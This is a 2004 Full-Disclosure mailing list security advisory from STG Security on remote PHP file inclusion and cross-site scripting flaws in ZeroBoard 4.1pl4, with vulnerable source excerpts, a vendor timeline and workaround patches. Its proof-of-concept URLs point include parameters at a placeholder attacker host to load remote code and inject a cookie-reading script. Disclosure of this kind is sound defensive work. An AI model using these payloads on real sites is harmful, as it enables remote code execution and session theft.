[Full-Disclosure] STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site scripting vulnerabilities in ZeroBoard

• Previous message: Ian Gulliver: "[Full-Disclosure] Internet Explorer FTP client can be used to send mail"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: <vuln@secunia.com>, <news@securiteam.com>, <bugs@securitytracker.com>, <full-disclosure@lists.netsys.com>, <staff@packetstormsecurity.com>
Date: Fri, 24 Dec 2004 09:38:51 +0900

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site
scripting vulnerabilities in ZeroBoard

Revision 1.2
Date Published: 2004-12-20 (KST)
Last Update: 2004-12-24
Disclosed by SSR Team (advisory@stgsecurity.com)

Summary
=======
ZeroBoard is one of widely used web BBS applications in Korea. . However, an
input validation flaw can cause malicious attackers to run arbitrary
commands with the privilege of the HTTPD process, which is typically run as
the nobody user.

Vulnerability Class
===================
Implementation Error: Input validation flaw

Impact
======
High : arbitrary commands execution.

Affected Products
================
ZeroBoard 4.1pl4 and prior

Vendor Status: NOT FIXED
========================
2004-11-20 Vulnerabilities found.
2004-11-20 1st vendor contact, but they didn't replied.
2004-11-22 2nd vendor contact, but they didn't replied.
2004-12-13 STG Security, Inc. customer notified.
2004-12-24 Official release.

Details
=======
Vulnerability 1 : PHP source injection vulnerability
- - ------------------------------------
- - - Proof of concept
http://[victim]/outlogin.php?_zb_path=ftp://[attacker]/pub/

- - - Environment
PHP 5.0.x
php.ini : register_globals = On

- - - Description
As of PHP 5.0.0, file_exists() can be used with URL wrappers explained at
http://www.php.net/manual/en/function.file-exists.php. Thus _zb_path
parameter in outlogin.php can be easily exploited.

- - - Part of vulnerable source, outlogin.php.
- - ----
// 제로보드 디렉토리 인지 체크
if(!file_exists($_zb_path."lib.php")) {
  echo "제로보드 디렉토리가 아닙니다";
  return;
}

// _head.php 읽음
@include $_zb_path."_head.php";

}
- - ----

Vulnerability 2 : PHP source injection vulnerability
- - ------------------------------------
- - - Proof of concept
http://[victim]/include/write.php?dir=http://[attacker]/

- - - Environment
php.ini: register_globals = On

- - - Reason
Uninitialized $dir variable in write.php

- - - Part of vulnerable source, include/write.php
- - ----
include $dir."/write.php";
- - ----

Vulnerability 3 : Cross-site scripting vulnerability
- - --------------------------------------
- - - Proof of concept
http://[victim]/check_user_id.php?user_id=<script>alert(document.cookie)</sc
ript>

- - - Reason
check_user_id.php doesn't validate the input value of user_id.

- - - Part of vulnerable source, check_user_id.php
- - ----
$user_id = trim($user_id);
... 생략 ...
if($check[0]) echo "$user_id 는 이미 등록된<br> 아이디입니다";
else echo"$user_id 는 사용하실수 있습니다";
... 생략 ...
- - ----

Workaround
==========
Without official patches of theses vulnerability, modify the vulnerable
sources as following recommendations.

Vulnerability 1: As of zboard 4.1pl4
- - ----------------------------
Insert the following code at 59th line of outlogin.php,

if(eregi(":\/\/",$_zb_path)) $_zb_path="";

Vulnerability 2: As of zboard 4.1pl4
- - ----------------------------
Insert the following code at 15th line of include/write.php,

if(eregi(":\/\/",$dir)) $dir="";

Vulnerability 3: As of zboard 4.1pl4
- - ----------------------------
Insert the following code at 3rd line of check_user_id.php,

$user_id = htmlspecialchars(trim($user_id));

Credits
======
Jeremy Bae at STG Security

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0

iQA/AwUBQctlEj9dVHd/hpsuEQJffgCg5fzqeXst5usCjWoK5fNV6lruGakAoJtM
awAFdddxTNRwEEy4vyUuxre9
=kiqS
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

• Previous message: Ian Gulliver: "[Full-Disclosure] Internet Explorer FTP client can be used to send mail"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]